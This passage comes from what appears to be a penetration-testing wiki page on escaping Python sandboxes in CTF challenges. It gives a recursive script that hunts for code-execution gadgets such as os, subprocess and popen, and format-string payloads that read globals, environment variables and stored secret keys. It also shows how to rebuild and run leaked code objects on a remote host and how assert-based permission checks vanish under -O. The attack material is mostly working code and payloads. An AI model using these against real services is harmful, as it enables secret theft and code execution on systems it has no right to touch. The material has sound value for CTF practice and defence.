DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close """ ``` ## Recursive Search of Builtins, Globals... {% hint style="warning" %} This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places where you can find that object.** {% endhint %} ```python import os, sys # Import these to find more gadgets SEARCH_FOR = { # Misc "__globals__": set(), "builtins": set(), "__builtins__": set(), "open": set(), # RCE libs "os": set(), "subprocess": set(), "commands": set(), "pty": set(), "importlib": set(), "imp": set(), "sys": set(), "pip": set(), "pdb": set(), # RCE methods "system": set(), "popen": set(), "getstatusoutput": set(), "getoutput": set(), "call": set(), "Popen": set(), "popen": set(), "spawn": set(), "import_module": set(), "__import__": set(), "load_source": set(), "execfile": set(), "execute": set() } #More than 4 is very time consuming MAX_CONT = 4 #The ALREADY_CHECKED makes the script run much faster, but some solutions won't be found #ALREADY_CHECKED = set() def check_recursive(element, cont, name, orig_n, orig_i, execute): # If bigger than maximum, stop if cont > MAX_CONT: return # If already checked, stop #if name and name in ALREADY_CHECKED: # return # Add to already checked #if name: # ALREADY_CHECKED.add(name) # If found add to the dict for k in SEARCH_FOR: if k in dir(element) or (type(element) is dict and k in element): SEARCH_FOR[k].add(f"{orig_i}: {orig_n}.{name}") # Continue with the recursivity for new_element in dir(element): try: check_recursive(getattr(element, new_element), cont+1, f"{name}.{new_element}", orig_n, orig_i, execute) # WARNING: Calling random functions sometimes kills the script # Comment this part if you notice that behaviour!! if execute: try: if callable(getattr(element, new_element)): check_recursive(getattr(element, new_element)(), cont+1, f"{name}.{new_element}()", orig_i, execute) except: pass except: pass # If in a dict, scan also each key, very important if type(element) is dict: for new_element in element: check_recursive(element[new_element], cont+1, f"{name}[{new_element}]", orig_n, orig_i) def main(): print("Checking from empty string...") total = [""] for i,element in enumerate(total): print(f"\rStatus: {i}/{len(total)}", end="") cont = 1 check_recursive(element, cont, "", str(element), f"Empty str {i}", True) print() print("Checking loaded subclasses...") total = "".__class__.__base__.__subclasses__() for i,element in enumerate(total): print(f"\rStatus: {i}/{len(total)}", end="") cont = 1 check_recursive(element, cont, "", str(element), f"Subclass {i}", True) print() print("Checking from global functions...") total = [print, check_recursive] for i,element in enumerate(total): print(f"\rStatus: {i}/{len(total)}", end="") cont = 1 check_recursive(element, cont, "", str(element), f"Global func {i}", False) print() print(SEARCH_FOR) if __name__ == "__main__": main() ``` You can check the output of this script on this page: {% content-ref url="output-searching-python-internals.md" %} [output-searching-python-internals.md](output-searching-python-internals.md) {% endcontent-ref %} ![](<../../../.gitbook/assets/image (9) (1) (2).png>) \ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Python Format String If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example. {% hint style="info" %} However, there is a **limitation**, you can only use the symbols `.[]`, so you **won't be able to execute arbitrary code**, just to read information.\ _**If you know how to execute code through this vulnerability, please contact me.**_ {% endhint %} ```python # Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/ CONFIG = { "KEY": "ASXFYFGK78989" } class PeopleInfo: def __init__(self, fname, lname): self.fname = fname self.lname = lname def get_name_for_avatar(avatar_str, people_obj): return avatar_str.format(people_obj = people_obj) people = PeopleInfo('GEEKS', 'FORGEEKS') st = "{people_obj.__init__.__globals__[CONFIG][KEY]}" get_name_for_avatar(st, people_obj = people) ``` Note how you can **access attributes** in a normal way with a **dot** like `people_obj.__init__` and **dict element** with **parenthesis** without quotes `__globals__[CONFIG]` Also note that you can use `.__dict__` to enumerate elements of an object `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)` Some other interesting characteristics from format strings is the possibility of **executing** the **functions** **`str`**, **`repr`** and **`ascii`** in the indicated object by adding **`!s`**, **`!r`**, **`!a`** respectively: ```python st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}" get_name_for_avatar(st, people_obj = people) ``` Moreover, it's possible to **code new formatters** in classes: ```python class HAL9000(object): def __format__(self, format): if (format == 'open-the-pod-bay-doors'): return "I'm afraid I can't do that." return 'HAL 9000' '{:open-the-pod-bay-doors}'.format(HAL9000()) #I'm afraid I can't do that. ``` **More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info) ### Sensitive Information Disclosure Payloads ```python {whoami.__class__.__dict__} {whoami.__globals__[os].__dict__} {whoami.__globals__[os].environ} {whoami.__globals__[sys].path} {whoami.__globals__[sys].modules} # Access an element through several links {whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__} ``` ## Dissecting Python Objects {% hint style="info" %} If you want to **learn** about **python bytecode** in depth read this **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) {% endhint %} In some CTFs you could be provided with the name of a **custom function where the flag** resides and you need to see the **internals** of the **function** to extract it. This is the function to inspect: ```python def get_flag(some_input): var1=1 var2="secretcode" var3=["some","array"] if some_input == var2: return "THIS-IS-THE-FALG!" else: return "Nope" ``` #### dir ```python dir() #General dir() to find what we have loaded ['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x'] dir(get_flag) #Get info tof the function ['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name'] ``` #### globals `__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared: ```python get_flag.func_globals get_flag.__globals__ {'b': 3, 'names': ('open', 'read'), '__builtins__': , 'codeobj': at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': , 'filename': './poc.py', '__package__': None, 'read': , 'code': , 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': , '__name__': '__main__', 'foo': , '__doc__': None, 'dis': } #If you have access to some variable value CustomClassObject.__class__.__init__.__globals__ ``` [**See here more places to obtain globals**](./#globals-and-locals) ### **Accessing the function code** **`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function. ```python # In our current example get_flag.__code__ ", line 1 # Compiling some python code compile("print(5)", "", "single") at 0x7f9ca01330c0, file "", line 1> #Get the attributes of the code object dir(get_flag.__code__) ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames'] ``` ### Getting Code Information ```python # Another example s = ''' a = 5 b = 'text' def f(x): return x f(5) ''' c=compile(s, "", "exec") # __doc__: Get the description of the function, if any print.__doc__ # co_consts: Constants get_flag.__code__.co_consts (None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope') c.co_consts #Remember that the exec mode in compile() generates a bytecode that finally returns None. (5, 'text', , 'f', None # co_names: Names used by the bytecode which can be global variables, functions, and classes or also attributes loaded from objects. get_flag.__code__.co_names () c.co_names ('a', 'b', 'f') #co_varnames: Local names used by the bytecode (arguments first, then the local variables) get_flag.__code__.co_varnames ('some_input', 'var1', 'var2', 'var3') #co_cellvars: Nonlocal variables These are the local variables of a function accessed by its inner functions. get_flag.__code__.co_cellvars () #co_freevars: Free variables are the local variables of an outer function which are accessed by its inner function. get_flag.__code__.co_freevars () #Get bytecode get_flag.__code__.co_code 'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S' ``` ### **Disassembly a function** ```python import dis dis.dis(get_flag) 2 0 LOAD_CONST 1 (1) 3 STORE_FAST 1 (var1) 3 6 LOAD_CONST 2 ('secretcode') 9 STORE_FAST 2 (var2) 4 12 LOAD_CONST 3 ('some') 15 LOAD_CONST 4 ('array') 18 BUILD_LIST 2 21 STORE_FAST 3 (var3) 5 24 LOAD_FAST 0 (some_input) 27 LOAD_FAST 2 (var2) 30 COMPARE_OP 2 (==) 33 POP_JUMP_IF_FALSE 40 6 36 LOAD_CONST 5 ('THIS-IS-THE-FLAG!') 39 RETURN_VALUE 8 >> 40 LOAD_CONST 6 ('Nope') 43 RETURN_VALUE 44 LOAD_CONST 0 (None) 47 RETURN_VALUE ``` Notice that **if you cannot import `dis` in the python sandbox** you can obtain the **bytecode** of the function (`get_flag.func_code.co_code`) and **disassemble** it locally. You won't see the content of the variables being loaded (`LOAD_CONST`) but you can guess them from (`get_flag.func_code.co_consts`) because `LOAD_CONST`also tells the offset of the variable being loaded. ```python dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S') 0 LOAD_CONST 1 (1) 3 STORE_FAST 1 (1) 6 LOAD_CONST 2 (2) 9 STORE_FAST 2 (2) 12 LOAD_CONST 3 (3) 15 LOAD_CONST 4 (4) 18 BUILD_LIST 2 21 STORE_FAST 3 (3) 24 LOAD_FAST 0 (0) 27 LOAD_FAST 2 (2) 30 COMPARE_OP 2 (==) 33 POP_JUMP_IF_FALSE 40 36 LOAD_CONST 5 (5) 39 RETURN_VALUE >> 40 LOAD_CONST 6 (6) 43 RETURN_VALUE 44 LOAD_CONST 0 (0) 47 RETURN_VALUE ``` ## Compiling Python Now, let us imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\ Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_) ```python def get_flag(some_input): var1=1 var2="secretcode" var3=["some","array"] def calc_flag(flag_rot2): return ''.join(chr(ord(c)-2) for c in flag_rot2) if some_input == var2: return calc_flag("VjkuKuVjgHnci") else: return "Nope" ``` ### Creating the code object First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked: ```python code_type = type((lambda: None).__code__) # Check the following hint if you get an error in calling this code_obj = code_type(co_argcount, co_kwonlyargcount, co_nlocals, co_stacksize, co_flags, co_code, co_consts, co_names, co_varnames, co_filename, co_name, co_firstlineno, co_lnotab, freevars=None, cellvars=None) # Execution eval(code_obj) #Execute as a whole script # If you have the code of a function, execute it mydict = {} mydict['__builtins__'] = __builtins__ function_type(code_obj, mydict, None, None, None)("secretcode") ``` {% hint style="info" %} Depending on the python version the **parameters** of `code_type` may have a **different order**. The best way to know the order of the params in the python version you are running is to run: ``` import types types.CodeType.__doc__ 'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.' ``` {% endhint %} ### Recreating a leaked function {% hint style="warning" %} In the following example, we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**. {% endhint %} ```python fc = get_flag.__code__ # In a real situation the values like fc.co_argcount are the ones you need to leak code_obj = code_type(fc.co_argcount, fc.co_kwonlyargcount, fc.co_nlocals, fc.co_stacksize, fc.co_flags, fc.co_code, fc.co_consts, fc.co_names, fc.co_varnames, fc.co_filename, fc.co_name, fc.co_firstlineno, fc.co_lnotab, cellvars=fc.co_cellvars, freevars=fc.co_freevars) mydict = {} mydict['__builtins__'] = __builtins__ function_type(code_obj, mydict, None, None, None)("secretcode") #ThisIsTheFlag ``` ### Bypass Defenses In previous examples at the beginning of this post, you can see **how to execute any python code using the `compile` function**. This is interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\ Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF). For example, let's compile and execute manually a function that reads _./poc.py_: ```python #Locally def read(): return open("./poc.py",'r').read() read.__code__.co_code 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S' ``` ```python #On Remote function_type = type(lambda: None) code_type = type((lambda: None).__code__) #Get consts = (None, "./poc.py", 'r') bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S' names = ('open','read') # And execute it using eval/exec eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '', 1, '', (), ())) #You could also execute it directly mydict = {} mydict['__builtins__'] = __builtins__ codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '', 1, '', (), ()) function_type(codeobj, mydict, None, None, None)() ``` If you cannot access `eval` or `exec` you could create a **proper function**, but calling it directly is usually going to fail with: _constructor not accessible in restricted mode_. So you need a **function not in the restricted environment to call this function.** ```python #Compile a regular print ftype = type(lambda: None) ctype = type((lambda: None).func_code) f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {}) f(42) ``` ## Decompiling Compiled Python Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code. **Check out this tutorial**: {% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} [.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) {% endcontent-ref %} ## Misc Python ### Assert Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\ Therefore, checks like ```python def check_permission(super_user): try: assert(super_user) print("\nYou are a super user\n") except AssertionError: print(f"\nNot a Super User!!!\n") ``` will be bypassed ## References * [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/) * [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/) * [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/) * [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape) * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
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